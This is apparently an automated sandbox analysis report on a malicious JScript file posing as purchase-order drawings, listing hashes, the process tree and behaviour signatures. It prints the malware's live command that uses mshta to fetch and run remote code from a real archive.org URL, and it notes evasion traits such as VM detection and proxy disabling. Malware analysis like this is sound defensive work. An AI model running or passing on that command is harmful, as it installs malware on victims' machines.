Favorites
Tools
Dr.Zero Chatbot
Notifications
Guide 2020-06-10
Version history 2020-06-10

Summary | ZeroBOX

New PO 3D Step drawings.jse

Category	Machine	Started	Completed
FILE	s1_win7_x6401	Jan. 8, 2025, 12:31 p.m.	Jan. 8, 2025, 12:33 p.m.

Size	6.8KB
Type	ASCII text, with very long lines, with CRLF line terminators
MD5	`105d66b76a85c6b7b5e8cccdaff36744`
SHA256	`5067ae856163cdc7f64eadf716210a5da82d83adc4e15aafa2c05bd7ba07bcb4`
CRC32	`F4EBE544`
ssdeep	`192:lmaRotvfmdrxbJMuoIYTuoQFrUfIKL9F2f8grzs3fSJIBcVIC8ZN25I1Ow:AaDrREu5JGU2th`
Yara	None matched

wscript.exe "C:\Windows\System32\wscript.exe" "C:\Users\test22\AppData\Local\Temp\New PO 3D Step drawings.jse"
2552
- mshta.exe "C:\Windows\System32\mshta.exe" https://ia902208.us.archive.org/35/items/monaonao/1.html
  2864

Name	Response	Post-Analysis Lookup
ia902208.us.archive.org		207.241.228.68

IP Address	Status	Action
164.124.101.2	Active	Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Jan. 8, 2025, 12:31 p.m.		1	1	0

Allocates read-write-execute memory (usually to unpack itself) (1 event)

Time & API	Arguments	Status	Return	Repeated
NtProtectVirtualMemory Jan. 8, 2025, 12:31 p.m.	process_identifier: 2864 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73bc2000 process_handle: 0xffffffff	1	0	0

Creates a suspicious process (2 events)

cmdline	"C:\Windows\System32\mshta.exe" https://ia902208.us.archive.org/35/items/monaonao/1.html
cmdline	mshta https://ia902208.us.archive.org/35/items/monaonao/1.html

A process created a hidden window (1 event)

Time & API	Arguments	Status	Return	Repeated
ShellExecuteExW Jan. 8, 2025, 12:31 p.m.	show_type: 0 filepath_r: mshta parameters: https://ia902208.us.archive.org/35/items/monaonao/1.html filepath: mshta	1	1	0

File has been identified by 3 AntiVirus engines on VirusTotal as malicious (3 events)

Symantec	CL.Downloader!gen87
NANO-Antivirus	Riskware.Script.Obfuscated.kcdfgx
TrendMicro	HEUR_JS.WCO

Disables proxy possibly for traffic interception (1 event)

Time & API	Arguments	Status	Return	Repeated
RegSetValueExA Jan. 8, 2025, 12:31 p.m.	key_handle: 0x000002d4 regkey_r: ProxyEnable reg_type: 4 (REG_DWORD) value: 0 regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable	1	0	0

One or more non-whitelisted processes were created (2 events)

parent_process	wscript.exe				martian_process	"C:\Windows\System32\mshta.exe" https://ia902208.us.archive.org/35/items/monaonao/1.html
parent_process	wscript.exe				martian_process	mshta https://ia902208.us.archive.org/35/items/monaonao/1.html

The process wscript.exe wrote an executable file to disk which it then attempted to execute (1 event)

file	C:\Windows\System32\mshta.exe